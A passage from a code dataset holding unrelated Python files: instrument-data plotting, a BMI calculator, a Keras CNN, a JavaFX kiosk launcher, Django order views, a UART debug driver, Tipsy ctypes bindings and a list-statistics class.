offset=1, numvalues=NUMVALUES)\r\n y_pos, z_rot, x_rot = data[0], data[1], data[2]\r\n# header, data = datarectools.Datarecorder(pidevice).read(offset=1, numvalues=NUMVALUES)\r\n# print('Num. of recorded points: ', pidevice.qDRL())\r\n samp_time = NUMVALUES/RECRATE\r\n n_data = NUMVALUES\r\n \r\n# print(header)\r\n# print((data))\r\n# # y_pos, z_rot, x_rot = data[0], data[1], data[2]\r\n# y_pos = data[0]\r\n \r\n# print('Sampling Rate = ', RECRATE)\r\n# print('Data length = ', n_data)\r\n# print('Time = ', samp_time)\r\n# print(len(y_pos))\r\n\r\n\r\n\r\n''' \r\n Save file / Exporting TXT\r\n'''\r\nheader = ['%s\\n' %(name+'_PI'),\r\n 'Local current time : %s\\n' %now.strftime(\"%Y-%m-%d %H:%M:%S\"),\r\n 'Fs = %e (Hz)\\n' %RECRATE,\r\n 'Record time: %e (s)\\n' %samp_time,\r\n 'Frame Number = %i\\n' %NUMVALUES,\r\n 'Channel_1: Position /um \\n',\r\n 'Channel_2: Hor_Angle /urad \\n',\r\n 'Channel_3: Ver_Angle /urad \\n',\r\n 'Channel_4: xxx \\n',\r\n '-------------------------------------------------\\n',\r\n ]\r\nout_str = ['%f, %f, %f\\n' %(y_pos[i], z_rot[i], x_rot[i]) for i in range(NUMVALUES)]\r\n\r\n'''\r\n Output\r\n'''\r\nExport_Data(PI_name, header, out_str)\r\nprint('TXT file saved')\r\n\r\nt = np.linspace(0, samp_time, num=n_data)\r\n\r\nplt.figure(1)\r\nplt.gcf().set_size_inches(18,9)\r\n\r\nplt.subplot(3,1,1)\r\nplt.plot(t, y_pos, color='blue', label='length')\r\nplt.title('Length')\r\nplt.xlabel('Time /s')\r\nplt.ylabel('Position /um')\r\nplt.grid(which='both', axis='both')\r\n\r\nplt.subplot(3,1,2)\r\nplt.plot(t, z_rot, color='red', label='Hor_Angle')\r\nplt.grid(which='both', axis='both')\r\nplt.xlabel('Time /s')\r\nplt.ylabel('Angle /urad')\r\nplt.title('Hor_Angle')\r\n\r\nplt.subplot(3,1,3)\r\nplt.plot(t, x_rot, color='black', label='Ver_Angle')\r\nplt.grid(which='both', axis='both')\r\nplt.title('Ver_Angle')\r\nplt.xlabel('Time /s')\r\nplt.ylabel('Angle /urad')\r\n\r\nfigManager = plt.get_current_fig_manager()\r\nfigManager.window.showMaximized()\r\nplt.tight_layout()\r\n\r\nplt.show()\r\n","sub_path":"Test_trigger_record.py","file_name":"Test_trigger_record.py","file_ext":"py","file_size_in_byte":9937,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"430125985","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Feb 13 15:42:24 2021\n\n@author: Henao\n\"\"\"\n\ndef calcular_BMI(peso_en_libras: float, estatura_en_pulgadas: float)-> float:\n '''\n Algorithm to calculate the body mass from your weight in pounds and your height in inches.\n Parameters\n ----------\n peso_en_libras : float\n Weight in pounds\n estatura_en_pulgadas : float\n Height in inches\n\n\n Returns\n ----------\n float\n \n BMI: your body mass index \n \n '''\n peso = peso_en_libras * 0.45\n altura = estatura_en_pulgadas * 0.025\n BMI = round(float(peso / (altura**2)),2)\n return BMI\n \n \npeso_en_libras = float(input(\"Enter your weight in pounds : \"))\nestatura_en_pulgadas = float(input(\"Enter your height in inches: \"))\nindice = calcular_BMI(peso_en_libras , estatura_en_pulgadas)\nprint(\"su imc es: \", indice)\n#print(\"Your body mass index is: \" , calcular_BMI(peso_en_libras, estatura_en_pulgadas))","sub_path":"calcular_BMI.py","file_name":"calcular_BMI.py","file_ext":"py","file_size_in_byte":951,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"231250675","text":"# 80%\n\n# 0. 사용할 패키지 불러오기\nimport numpy as np\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Flatten, Dropout, Activation\nfrom keras.layers.convolutional import Conv2D\nfrom keras.layers.convolutional import MaxPooling2D\nfrom keras.preprocessing.image import ImageDataGenerator, array_to_img, img_to_array, load_img\nfrom keras import backend as K\n\nimg_w, img_h = 150, 150\ntrain_data_dir = './dataset/training_set'\ntest_data_dir = './dataset/test_set'\nnb_train_samples = 100\nnb_test_samples = 50\nepochs = 25\nbatch_size = 16\n\nif K.image_data_format() == 'channels_first':\n input_shape = (3, img_w, img_h)\nelse:\n input_shape = (img_w, img_h, 3)\n\n# 1. dataset 생성\n# 변화를 줘서 부풀리기.\ntrain_datagen = ImageDataGenerator(rescale=1./255,\n # rotation_range=15,\n # width_shift_range=0.1,\n # height_shift_range=0.1,\n shear_range=0.5,\n zoom_range=[0.8, 2.0],\n horizontal_flip=True,\n # vertical_flip=True,\n fill_mode='nearest')\n\n# 훈련용 generator 생성\ntrain_generator = train_datagen.flow_from_directory(\n train_data_dir, # img 경로\n target_size=(img_w, img_h), # 패치 이미지 크기\n batch_size=batch_size, # 배치 크기\n class_mode='categorical') # categorical/binary/sparse/None\n\ntest_datagen = ImageDataGenerator(rescale=1./255)\n# 검증용 generator 생성\ntest_generator = test_datagen.flow_from_directory(\n test_data_dir,\n target_size=(img_w, img_h),\n batch_size=batch_size,\n class_mode='categorical')\n\n\n\n# 2. 모델 구성하기\nmodel = Sequential()\nmodel.add(Conv2D(32, kernel_size=(3, 3), input_shape=input_shape, activation='relu'))\n# model.add(Conv2D(64, (3, 3), activation='relu'))\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\n\nmodel.add(Conv2D(32, (3, 3), activation='relu'))\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\n\nmodel.add(Conv2D(64, (3, 3), activation='relu'))\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\n\nmodel.add(Flatten())\nmodel.add(Dense(64, activation='relu'))\n# model.add(Dense(256, activation='relu'))\nmodel.add(Dropout(0.5))\nmodel.add(Dense(3, activation='sigmoid'))\n\n# 3. 모델 학습과정 설정하기\nmodel.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['accuracy'])\n# model.compile(loss='binary_crossentropy', optimizer='rmsprop', metrics=['accuracy'])\n\n\n\n\n\n# 4. 모델 학습시키기\nmodel.fit_generator(train_generator, steps_per_epoch=nb_train_samples, epochs=epochs, validation_data=test_generator, validation_steps=nb_test_samples)\nmodel.save_weights('test_model.h5')\n\n# 5. 모델 평가하기\nprint(\"-- Evaluate(정확도) --\")\nscores = model.evaluate_generator(test_generator, steps=5)\nprint(\"%s: %.2f%%\" %(model.metrics_names[1], scores[1]*100))\n#\n# # 6. 모델 저장하기\n# from keras.models import load_model\n# model.save('testModel.h5')\n","sub_path":"cnn/makeModel.py","file_name":"makeModel.py","file_ext":"py","file_size_in_byte":3085,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"41700144","text":"#!/usr/bin/env python3\nimport argparse\nimport os\nimport shutil\nimport signal\nimport subprocess\n\n# Absolute path to Gluon JavaFX directory\nSYSTEM_INIT_BIN = \"/usr/sbin/init\"\nGLUON_JAVAFX_PATH = \"/opt/javafx-sdk\"\n\n\n# Helper method to split JVM properties specified as -Dkey=value\ndef jvm_property(data):\n parts = tuple(str(data).split('=', 1))\n return parts if len(parts) == 2 else (parts[0], '')\n\n\n# Parse known arguments and preserve others\nparser = argparse.ArgumentParser(description='Gluon JavaFX Kiosk Launcher', allow_abbrev=False)\nparser.add_argument('--add-modules', default='')\nparser.add_argument('-p', '--module-path', default='')\nparser.add_argument('-D', default=[], action='append', type=jvm_property, dest='properties')\nargs, unknown_args = parser.parse_known_args()\n\n# Patch '--module-path' option\nmodule_path = list(filter(None, args.module_path.split(':')))\nmodule_path.insert(0, GLUON_JAVAFX_PATH + '/lib')\n\n# Patch '--add-modules' option\nadd_modules = list(filter(None, args.add_modules.split(',')))\nadd_modules.insert(0, 'javafx.controls')\n\n# Patch generic properties\nproperties = dict(filter(None, args.properties))\nproperties.setdefault('glass.platform', 'Monocle')\nproperties.setdefault('monocle.platform', 'EGL')\nproperties.setdefault('monocle.platform.traceConfig', 'false')\nproperties.setdefault('monocle.egl.lib', GLUON_JAVAFX_PATH + '/lib/libgluon_drm.so')\nproperties.setdefault('egl.displayid', '/dev/dri/card0')\nproperties.setdefault('javafx.verbose', 'false')\nproperties.setdefault('prism.verbose', 'false')\n\n# Patch 'java.library.path' property\njava_library_path = list(filter(None, properties.get('java.library.path', '').split(':')))\njava_library_path.insert(0, GLUON_JAVAFX_PATH + '/lib')\nproperties['java.library.path'] = ':'.join(java_library_path)\n\n# Patch environment variables\njvm_env = os.environ.copy()\njvm_env['ENABLE_GLUON_COMMERCIAL_EXTENSIONS'] = 'true'\n\n# Build final list of JVM arguments\njvm_args = [\n '--module-path', ':'.join(module_path),\n '--add-modules', ','.join(add_modules),\n]\njvm_args.extend(['-D' + key + '=' + value for key, value in properties.items()])\njvm_args.extend(unknown_args)\n\n# Search for absolute path of JVM\njvm_path = shutil.which('java')\nif jvm_path is None:\n parser.error(\"Unable to find 'java' binary in current PATH\")\n\n# Ensure we are running as root\nif os.geteuid() != 0:\n parser.error(\"Unable to execute 'java-kiosk' without running as root\")\n\n# Run application in kiosk mode\ntry:\n # Ignore Ctrl+C for python process to ensure completion\n signal.signal(signal.SIGINT, lambda signum, frame: None)\n\n # Switch to runlevel 3 to stop X11\n subprocess.run([SYSTEM_INIT_BIN, '3'])\n\n # Execute JVM with patched options\n subprocess.run([jvm_path] + jvm_args, env=jvm_env)\nexcept KeyboardInterrupt:\n # Silently ignore KeyboardInterrupt, we expect the user to sometimes abort the script\n pass\nfinally:\n # Switch back to runlevel 5 to start X11\n subprocess.run([SYSTEM_INIT_BIN, '5'])\n","sub_path":"image/resources/java/java-kiosk.py","file_name":"java-kiosk.py","file_ext":"py","file_size_in_byte":2999,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"549269187","text":"import nltk\nfrom nltk.corpus import ConllChunkCorpusReader\n\nfrom nltk.corpus.reader.tagged import TaggedCorpusReader\nroot = '/usr/local/share/nltk_data/corpora/MASC-for-NE/'\nmasc_for_ne = TaggedCorpusReader(root,'.*', '_')\n\nsents = masc_for_ne.tagged_sents()\nne_sents = [nltk.ne_chunk(sent) for sent in sents]\n\nroot = \"/usr/local/share/nltk_data/corpora/masc_conll/\"\ngold_corpus = ConllChunkCorpusReader(root,r\".*\\.conll\", chunk_types=(\"DATE\",\"PERSON\",\"ORGANIZATION\",\"LOCATION\"))\ngold_sents = gold_corpus.chunked_sents()\n\n","sub_path":"classes/vassar/Linguistics_HW_4/Prob3/init_masc_ne.py","file_name":"init_masc_ne.py","file_ext":"py","file_size_in_byte":522,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"353570048","text":"from django.shortcuts import render\n\nfrom website.models.order_model import Order\nfrom website.models.product_order_model import ProductOrder\nfrom website.models.product_model import Product\nfrom django.contrib.auth.models import User\nfrom django.http import HttpResponseForbidden\nfrom django.http import HttpResponseRedirect\nfrom django.urls import reverse\n\n\ndef order_detail(request, order_id):\n\t\"\"\"\n This function is invoked to display the details of a user's order.\n\n ---Arguments---\n request: the full HTTP request object\n order_id(integer): the id of the order\n\n ---GET---\n Renders order_detail.html\n\n ---Context---\n 'order'(instance): the order instance\n 'orderproducts'(list): a list of the products on the order \n 'total'(integer): the total cost of an order\n\n Author: Blaise Roberts\n \"\"\"\n\n\ttemplate_name = 'order_detail.html'\n\torder = Order.objects.get(pk=order_id)\n\n\tif request.user == order.user:\n\t\t# Get seller object\n\t\tline_items = ProductOrder.objects.filter(order=order_id).values_list(\n\t\t\t'product_id').distinct()\n\t\tproduct_list = list()\n\t\ttotal = int()\n\t\tfor x in line_items:\n\t\t\tproduct = Product.objects.filter(pk=x[0])\n\t\t\tproduct_count = ProductOrder.objects.filter(product_id=x[0], \n\t\t\t\torder=order_id).count()\n\t\t\tsubtotal = product[0].price * product_count\n\t\t\ttotal += subtotal\n\t\t\tproduct_list.append((product, product_count, subtotal))\n\t\treturn render(request, template_name, {'order': order, \"orderproducts\":\n\t\t\tproduct_list, \"total\":total})\n\telse:\n\t\treturn HttpResponseForbidden('''Not your order, bruh! \n\t\t\t ''')\n\ndef delete_product_from_order(request, product_id, order_id):\n\n\t\"\"\"\n This function is invoked to delete a product from a user's order.\n\n ---Arguments---\n request: the full HTTP request object\n product_id(integer): the id of the product\n order_id(integer): the id of the order\n\n ---Return---\n Returns HttpResponseRedirect to order_detail\n\n Author: Jeremy Bakker and Jessica Younker\n \"\"\"\n\n\torder = Order.objects.get(pk=order_id, user=request.user)\n\tif request.user == order.user:\n\t\tProductOrder.objects.filter(product_id=product_id, \n\t\t\torder_id=order_id).delete()\n\t\treturn HttpResponseRedirect(reverse('website:order_detail', \n\t\t\targs=[order.id]))\n\telse:\n\t\treturn HttpResponseForbidden('''Not your order, bruh! \n\t\t\t ''')","sub_path":"website/views/order_detail_view.py","file_name":"order_detail_view.py","file_ext":"py","file_size_in_byte":2426,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"549207238","text":"import matplotlib.pyplot as plt\r\n\r\ndef func1():\r\n\tfd = open(\"build_tvp_time.log\", \"r\")\r\n\t# wfd = open(\"build_tvp_time.ana.log\", \"w\")\r\n\tn_lines = 0;\r\n\tx_r = []\r\n\ty_r = []\r\n\tfor line in fd:\r\n\t\tn_lines += 1\r\n\t\tif(n_lines > 1 and n_lines < 10246 and (n_lines - 2) % 3 == 0):\r\n\t\t\ta = line.find('size: [') + len('size: [')\r\n\t\t\tb = line.find(']', a)\r\n\t\t\tsub1 = (line[a:b])\r\n\t\t\tc = line.find('time: [') + len('time: [')\r\n\t\t\td = line.find(' s', c)\r\n\t\t\tsub2 = (line[c:d])\r\n\t\t\t# buf = \"%5d %f\\n\" % (int(sub1), float(sub2))\r\n\t\t\t# buf = str(sub1) + \" \" + str(sub2) + '\\n'\r\n\t\t\t# wfd.write(buf);\r\n\r\n\t\t\tx_r.append(int(sub1))\r\n\t\t\ty_r.append(float(sub2))\r\n\r\n\r\n\tfd.close()\r\n\t# wfd.flush()\r\n\t# wfd.close()\r\n\r\n\tfig = plt.figure()\r\n\tax1 = fig.add_subplot(111)\r\n\tax1.set_title('tvp build time (NBA dataset)')\r\n\tplt.xlabel('number of nodes associated with keyword')\r\n\tplt.ylabel(\"build time (second)\")\r\n\tss1 = ax1.scatter(x_r, y_r, c = 'r', marker = 'x')\r\n\tplt.legend([ss1], ['one keyword'], loc='upper left')\r\n\tplt.show()\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n\tfunc1()\r\n","sub_path":"nba_demo/build_tvp_time.py","file_name":"build_tvp_time.py","file_ext":"py","file_size_in_byte":1050,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"348849518","text":"import serial\nfrom struct import *\nfrom misoclib.tools.litescope.host.driver.reg import *\n\ndef write_b(uart, data):\n\tuart.write(pack('B',data))\n\nclass LiteScopeUARTDriver:\n\tcmds = {\n\t\t\"write\"\t: 0x01,\n\t\t\"read\"\t: 0x02\n\t}\n\tdef __init__(self, port, baudrate=115200, addrmap=None, busword=8, debug=False):\n\t\tself.port = port\n\t\tself.baudrate = str(baudrate)\n\t\tself.debug = debug\n\t\tself.uart = serial.Serial(port, baudrate, timeout=0.25)\n\t\tself.regs = build_map(addrmap, busword, self.read, self.write)\n\n\tdef open(self):\n\t\tself.uart.flushOutput()\n\t\tself.uart.close()\n\t\tself.uart.open()\n\t\tself.uart.flushInput()\n\t\ttry:\n\t\t\tself.regs.uart2wb_sel.write(1)\n\t\texcept:\n\t\t\tpass\n\n\tdef close(self):\n\t\ttry:\n\t\t\tself.regs.uart2wb_sel.write(0)\n\t\texcept:\n\t\t\tpass\n\t\tself.uart.flushOutput()\n\t\tself.uart.close()\n\n\tdef read(self, addr, burst_length=None, repeats=None):\n\t\tdatas = []\n\t\tdef to_int(v):\n\t\t\treturn 1 if v is None else v\n\t\tfor i in range(to_int(repeats)):\n\t\t\tself.uart.flushInput()\n\t\t\twrite_b(self.uart, self.cmds[\"read\"])\n\t\t\twrite_b(self.uart, burst_length)\n\t\t\twrite_b(self.uart, (addr//4 & 0xff000000) >> 24)\n\t\t\twrite_b(self.uart, (addr//4 & 0x00ff0000) >> 16)\n\t\t\twrite_b(self.uart, (addr//4 & 0x0000ff00) >> 8)\n\t\t\twrite_b(self.uart, (addr//4 & 0x000000ff))\n\t\t\tfor j in range(to_int(burst_length)):\n\t\t\t\tdata = 0\n\t\t\t\tfor k in range(4):\n\t\t\t\t\tdata = data << 8\n\t\t\t\t\tdata |= ord(self.uart.read())\n\t\t\t\tif self.debug:\n\t\t\t\t\tprint(\"RD %08X @ %08X\" %(data, (addr+j)*4))\n\t\t\t\tdatas.append(data)\n\t\treturn datas\n\n\tdef write(self, addr, data):\n\t\tif isinstance(data, list):\n\t\t\tburst_length = len(data)\n\t\telse:\n\t\t\tburst_length = 1\n\t\twrite_b(self.uart, self.cmds[\"write\"])\n\t\twrite_b(self.uart, burst_length)\n\t\twrite_b(self.uart, (addr//4 & 0xff000000) >> 24)\n\t\twrite_b(self.uart, (addr//4 & 0x00ff0000) >> 16)\n\t\twrite_b(self.uart, (addr//4 & 0x0000ff00) >> 8)\n\t\twrite_b(self.uart, (addr//4 & 0x000000ff))\n\t\tif isinstance(data, list):\n\t\t\tfor i in range(len(data)):\n\t\t\t\tdat = data[i]\n\t\t\t\tfor j in range(4):\n\t\t\t\t\twrite_b(self.uart, (dat & 0xff000000) >> 24)\n\t\t\t\t\tdat = dat << 8\n\t\t\t\tif self.debug:\n\t\t\t\t\tprint(\"WR %08X @ %08X\" %(data[i], (addr + i)*4))\n\t\telse:\n\t\t\tdat = data\n\t\t\tfor j in range(4):\n\t\t\t\twrite_b(self.uart, (dat & 0xff000000) >> 24)\n\t\t\t\tdat = dat << 8\n\t\t\tif self.debug:\n\t\t\t\tprint(\"WR %08X @ %08X\" %(data, (addr * 4)))\n","sub_path":"misoclib/tools/litescope/host/driver/uart.py","file_name":"uart.py","file_ext":"py","file_size_in_byte":2295,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"206291049","text":"import ctypes\nimport numpy as np\nimport numpy.ctypeslib as npct\n\n\"\"\"\n The mapping between the C and Python type interfaces for Tipsy.\n This is the lowest level of the Tipsy-Python interface. It is\n not intended for general use.' \n\"\"\"\n\n_native_float32_dtype = np.dtype('=f')\n_array_1d_float32 = npct.ndpointer(dtype=_native_float32_dtype, ndim=1, flags=('C','O','W','A'))\n_array_2d_float32 = npct.ndpointer(dtype=_native_float32_dtype, ndim=2, flags=('C','O','W','A'))\n\ndef _convert_array(x, name):\n if x is None:\n raise ValueError(name + ' cannot be None')\n if not isinstance(x, np.ndarray):\n raise TypeError(name + ' is not a numpy array')\n return np.require(x, dtype=_native_float32_dtype, requirements=['C_CONTIGUOUS', 'ALIGNED', 'WRITEABLE', 'OWNDATA', 'ENSUREARRAY'])\n\ndef _make_array(size, ndims=1, zero=False):\n if ndims == 1:\n return np.empty(size, dtype=_native_float32_dtype) if not zero else np.zeros(size, dtype=_native_float32_dtype)\n if ndims == 2:\n return np.empty((size, 3), dtype=_native_float32_dtype) if not zero else np.zeros((size, 3), dtype=_native_float32_dtype)\n raise ValueError(\"tipsy only supports 1d and 2d arrays\")\n\ndef _pretty_print(obj, attrs):\n repr = []\n for k in attrs:\n a = getattr(obj, k)\n repr.append('{0:10s}: {1:s}'.format(k, str(a.shape) if isinstance(a, np.ndarray) else str(a)))\n return '\\n'.join(repr)\n\nclass header():\n class struct(ctypes.Structure):\n _fields_ = [\n ('time' , ctypes.c_double),\n ('nbodies', ctypes.c_uint),\n ('ndim' , ctypes.c_int),\n ('ngas' , ctypes.c_uint),\n ('ndark' , ctypes.c_uint),\n ('nstar' , ctypes.c_uint)\n ]\n\n @classmethod\n def from_external(cls, hdr):\n self = cls()\n self.time = hdr.time\n self.nbodies = hdr.nbodies\n self.ndim = hdr.ndim\n self.ngas = hdr.ngas\n self.ndark = hdr.ndark\n self.nstar = hdr.nstar\n return self\n\n def __init__(self):\n self.c_data = header.struct()\n\n def __str__(self):\n return _pretty_print(self, ['time','nbodies','ngas','ndark','nstar'])\n \n @property\n def time(self):\n return self.c_data.time\n @time.setter\n def time(self, rhs):\n self.c_data.time = rhs\n @property\n def nbodies(self):\n return self.c_data.nbodies\n @nbodies.setter\n def nbodies(self, rhs):\n self.c_data.nbodies = rhs\n @property\n def ngas(self):\n return self.c_data.ngas\n @ngas.setter\n def ngas(self, rhs):\n self.c_data.ngas = rhs\n @property\n def ndark(self):\n return self.c_data.ndark\n @ndark.setter\n def ndark(self, rhs):\n self.c_data.ndark = rhs\n @property\n def nstar(self):\n return self.c_data.nstar\n @nstar.setter\n def nstar(self, rhs):\n self.c_data.nstar = rhs\n\n @classmethod\n def from_external(cls, time, ngas, ndark, nstar):\n self = cls()\n self.time = float(time)\n self.nbodies = int(ngas) + int(ndark) + int(nstar)\n self.ndim = 3\n self.ngas = int(ngas)\n self.ndark = int(ndark)\n self.nstar = int(nstar)\n self.c_data = header.struct.from_external(self)\n return self\n\nclass gas_data():\n class struct(ctypes.Structure):\n _fields_ = [\n ('mass' , _array_1d_float32),\n ('pos' , _array_2d_float32),\n ('vel' , _array_2d_float32),\n ('rho' , _array_1d_float32),\n ('temp' , _array_1d_float32),\n ('hsmooth', _array_1d_float32),\n ('metals' , _array_1d_float32),\n ('phi' , _array_1d_float32),\n ('size' , ctypes.c_size_t)\n ]\n \n def __init__(self):\n super().__init__()\n \n @classmethod\n def from_external(cls, other):\n self = cls()\n self.mass = other.mass.ctypes.data_as(_array_1d_float32)\n self.pos = 
other.pos.ctypes.data_as(_array_2d_float32)\n self.vel = other.vel.ctypes.data_as(_array_2d_float32)\n self.rho = other.rho.ctypes.data_as(_array_1d_float32)\n self.temp = other.temp.ctypes.data_as(_array_1d_float32)\n self.metals = other.metals.ctypes.data_as(_array_1d_float32)\n self.hsmooth = other.hsmooth.ctypes.data_as(_array_1d_float32)\n self.phi = other.phi.ctypes.data_as(_array_1d_float32)\n self.size = other.size\n return self\n\n def __init__(self):\n self.size = 0\n self.c_data = None\n \n def __str__(self):\n if self.c_data is not None:\n return _pretty_print(self, [k[0] for k in self.c_data._fields_])\n\n @classmethod\n def from_size(cls, size):\n self = cls()\n self.mass = _make_array(size)\n self.pos = _make_array(size, ndims=2)\n self.vel = _make_array(size, ndims=2)\n self.rho = _make_array(size)\n self.temp = _make_array(size)\n self.metals = _make_array(size)\n self.hsmooth = _make_array(size)\n self.phi = _make_array(size)\n self.size = size\n self.c_data = gas_data.struct.from_external(self)\n return self\n\n @classmethod\n def from_external(cls, mass, pos, vel, rho, temp, hsmooth, metals, phi, size):\n self = cls()\n self.mass = _convert_array(mass, 'mass')\n self.pos = _convert_array(pos, 'pos')\n self.vel = _convert_array(vel, 'vel')\n self.rho = _convert_array(rho, 'rho')\n self.temp = _convert_array(temp, 'temp')\n self.hsmooth = _convert_array(hsmooth, 'hsmooth')\n self.metals = _convert_array(metals, 'metals')\n self.phi = _convert_array(phi, 'phi')\n self.size = size\n self.c_data = gas_data.struct.from_external(self)\n return self\n\nclass dark_data():\n class struct(ctypes.Structure):\n _fields_ = [\n ('mass', _array_1d_float32),\n ('pos' , _array_2d_float32),\n ('vel' , _array_2d_float32),\n ('soft', _array_1d_float32),\n ('phi' , _array_1d_float32),\n ('size', ctypes.c_size_t)\n ]\n \n def __init__(self):\n super().__init__()\n \n @classmethod\n def from_external(cls, other):\n self = cls()\n self.mass = other.mass.ctypes.data_as(_array_1d_float32)\n self.pos = other.pos.ctypes.data_as(_array_2d_float32)\n self.vel = other.vel.ctypes.data_as(_array_2d_float32)\n self.phi = other.phi.ctypes.data_as(_array_1d_float32)\n self.soft = other.soft.ctypes.data_as(_array_1d_float32)\n self.size = other.size\n return self\n\n def __init__(self):\n self.size = 0\n self.c_data = None\n \n def __str__(self):\n if self.c_data is not None:\n return _pretty_print(self, [k[0] for k in self.c_data._fields_])\n \n @classmethod\n def from_size(cls, size):\n self = cls()\n self.mass = _make_array(size)\n self.pos = _make_array(size, ndims=2)\n self.vel = _make_array(size, ndims=2)\n self.phi = _make_array(size)\n self.soft = _make_array(size)\n self.size = size\n self.c_data = dark_data.struct.from_external(self)\n return self\n \n @classmethod\n def from_external(cls, mass, pos, vel, soft, phi, size):\n self = cls()\n self.mass = _convert_array(mass, 'mass')\n self.pos = _convert_array(pos, 'pos')\n self.vel = _convert_array(vel, 'vel')\n self.phi = _convert_array(phi, 'phi')\n \n if soft is not None and np.isscalar(soft):\n self.soft = _make_array(size, zero=True)\n self.soft += np.asscalar(np.array(soft, dtype=_native_float32_dtype))\n else:\n self.soft = _convert_array(soft, 'soft')\n \n self.size = size\n self.c_data = dark_data.struct.from_external(self)\n return self\n\nclass star_data():\n class struct(ctypes.Structure):\n _fields_ = [\n ('mass' , _array_1d_float32),\n ('pos' , _array_2d_float32),\n ('vel' , _array_2d_float32),\n ('metals', _array_1d_float32),\n 
('tform' , _array_1d_float32),\n ('soft' , _array_1d_float32),\n ('phi' , _array_1d_float32),\n ('size' , ctypes.c_size_t)\n ]\n \n def __init__(self):\n super().__init__()\n\n @classmethod\n def from_external(cls, other):\n self = cls()\n self.mass = other.mass.ctypes.data_as(_array_1d_float32)\n self.pos = other.pos.ctypes.data_as(_array_2d_float32)\n self.vel = other.vel.ctypes.data_as(_array_2d_float32)\n self.metals = other.metals.ctypes.data_as(_array_1d_float32)\n self.tform = other.tform.ctypes.data_as(_array_1d_float32)\n self.phi = other.phi.ctypes.data_as(_array_1d_float32)\n self.soft = other.soft.ctypes.data_as(_array_1d_float32)\n self.size = other.size\n return self\n\n def __init__(self):\n self.size = 0\n self.c_data = None\n \n def __str__(self):\n if self.c_data is not None:\n return _pretty_print(self, [k[0] for k in self.c_data._fields_])\n \n @classmethod\n def from_size(cls, size):\n self = cls()\n self.mass = _make_array(size)\n self.pos = _make_array(size, ndims=2)\n self.vel = _make_array(size, ndims=2)\n self.metals = _make_array(size)\n self.tform = _make_array(size)\n self.phi = _make_array(size)\n self.soft = _make_array(size)\n self.size = size\n self.c_data = star_data.struct.from_external(self)\n return self\n\n @classmethod\n def from_external(cls, mass, pos, vel, metals, tform, soft, phi, size):\n self = cls()\n self.mass = _convert_array(mass, 'mass')\n self.pos = _convert_array(pos, 'pos')\n self.vel = _convert_array(vel, 'vel')\n self.metals = _convert_array(metals, 'metals')\n self.tform = _convert_array(tform, 'tform')\n self.phi = _convert_array(phi, 'phi')\n \n if soft is not None and np.isscalar(soft):\n self.soft = _make_array(size, zero=True)\n self.soft += np.asscalar(np.array(soft, dtype=_native_float32_dtype))\n else:\n self.soft = _convert_array(soft, 'soft')\n \n self.size = size\n self.c_data = star_data.struct.from_external(self)\n return self\n\n","sub_path":"tipsy_c.py","file_name":"tipsy_c.py","file_ext":"py","file_size_in_byte":10639,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"456153486","text":"import logging\n\n\nclass numList:\n \"\"\"This is a numList class.\n\n Attributes:\n :maxMin (tuple): tuple of the Max and Min values in the list\n\n :max_diff (list): list of the highest diff between 2 adj values in list\n\n :list_add (int): sum of all the values in the list\n\n \"\"\"\n\n def __init__(self, myList=[]):\n self.list = myList\n self.maxMin = None\n self.max_diff = None\n self.list_add = None\n self.max_Min()\n self.find_diff()\n self.find_sum()\n\n def max_Min(self):\n \"\"\"\n Finds the max and min in a list of positive values and returns a tuple\n\n :param inputList: Is a list of positive values\n :returns: Tuple of the max and min values\n :raises ImportError: If numpy is not installed in the env\n :raises ValueError: If there are values less than 0\n :raises TypeError: If the inputList is not an actual list\n \"\"\"\n\n inputList = self.list\n logging.basicConfig(filename='log.txt', level=logging.DEBUG)\n\n try:\n import numpy\n except ImportError:\n logging.error(\"missing a module!\")\n raise ImportError(\"missing a module!\")\n for i in inputList:\n if i < 0:\n logging.warning(\"Negative value detected\")\n raise ValueError('Negative value detected')\n if not isinstance(inputList, list):\n logging.warning('Input is not a list')\n raise TypeError('Input is not a list')\n myMin = min(inputList)\n myMax = max(inputList)\n logging.debug(inputList)\n logging.debug('Min value: %s', myMin)\n logging.debug('Max value: %s', myMax)\n maxMinTuple = (myMin, myMax)\n logging.info(maxMinTuple)\n self.maxMin = maxMinTuple\n\n def find_diff(self):\n \"\"\"\n Finds maximum difference between two adjacent numbers in a list\n\n :param my_list: Is a list of numbers\n :returns: Largest difference between two adjacent numbers\n :raises ValueError: If my_list has 0 or 1 elements\n :raises ImportError: If numpy is not installed in environment\n :raises TypeError: If element in my_list is not an int, float, complex\n \"\"\"\n\n my_list = self.list\n logging.basicConfig(filename='log.txt', level=logging.DEBUG)\n\n logging.info('Finding max difference between adjacent values in list')\n logging.debug('Printing %s', str(my_list))\n n = 0\n if len(my_list) < 2:\n logging.warning('Not enough values to calculate difference')\n raise ValueError('List too small, no difference to compare!')\n for i in range(len(my_list)-1):\n if(isinstance(my_list[i], (int, float, complex)) and\n isinstance(my_list[i+1], (int, float, complex))):\n diff = abs(my_list[i+1] - my_list[i])\n if diff > n:\n n = diff\n else:\n raise TypeError('List elements must be int, float, complex!')\n logging.debug('Returns %s', str(n))\n self.max_diff = n\n\n def find_sum(self):\n \"\"\"\n Adds a lenist of numbers\n\n :param list_var: Is a list of numbers (int, float, complex)\n :returns: Addition of values in list\n :raises ValueError: If list_var is empty\n :raises ImportError: If numpy or numbers not installed in environment\n :raises TypeError: If 